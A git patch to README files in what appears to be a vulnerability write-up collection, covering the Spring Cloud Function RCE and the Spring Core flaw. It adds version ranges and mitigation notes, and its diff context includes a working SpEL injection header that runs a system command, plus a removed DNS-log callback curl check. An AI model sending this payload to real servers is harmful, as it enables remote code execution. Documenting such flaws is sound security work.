From 2670bf1b6b6c5c8e54f89524a2cc8a0de594487d Mon Sep 17 00:00:00 2001
From: helloexp <21156949+helloexp@users.noreply.github.com>
Date: Wed, 30 Mar 2022 11:51:46 +0800
Subject: [PATCH] update readme

---
 21-Spring Cloud/Spring Cloud Function RCE/README.md | 10 ++++------
 22-Spring Core/README.md                            |  8 +++++++-
 2 files changed, 11 insertions(+), 7 deletions(-)

diff --git a/21-Spring Cloud/Spring Cloud Function RCE/README.md b/21-Spring Cloud/Spring Cloud Function RCE/README.md
index ab0e208..e741c7a 100644
--- a/21-Spring Cloud/Spring Cloud Function RCE/README.md	
+++ b/21-Spring Cloud/Spring Cloud Function RCE/README.md	
@@ -7,6 +7,10 @@ header
 ```
 spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
 ```
+
+## 受影响吧版本
+SpringCloudFunction 3 <= 漏洞版本 <= 3.2.2
+
 # build
 ```bash
 wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
@@ -61,11 +65,5 @@ Content-Length: 5
 helloexp
 ```
 
-## check
-
-```bash
-curl -v 'https://helloexp.com/dnslog?q=random87535.rce.helloexp.com'
-```
-
 ## official GitHub info
 https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
diff --git a/22-Spring Core/README.md b/22-Spring Core/README.md
index 6a4dafd..332fd5a 100644
--- a/22-Spring Core/README.md	
+++ b/22-Spring Core/README.md	
@@ -8,4 +8,10 @@
 ![尴尬的局面](images/img_1.png)
 
 ## Spring 官方补丁也正在积极的赶制中  
-[Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529)
\ No newline at end of file
+[Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529)
+
+## 漏洞影响
+1. jdk 版本在9及以上的
+2. 使用了Spring Framework或衍生框架
+## 漏洞修复建议
+目前，Spring 官方暂未发布补丁，建议降低jdk 版本作为临时方案
\ No newline at end of file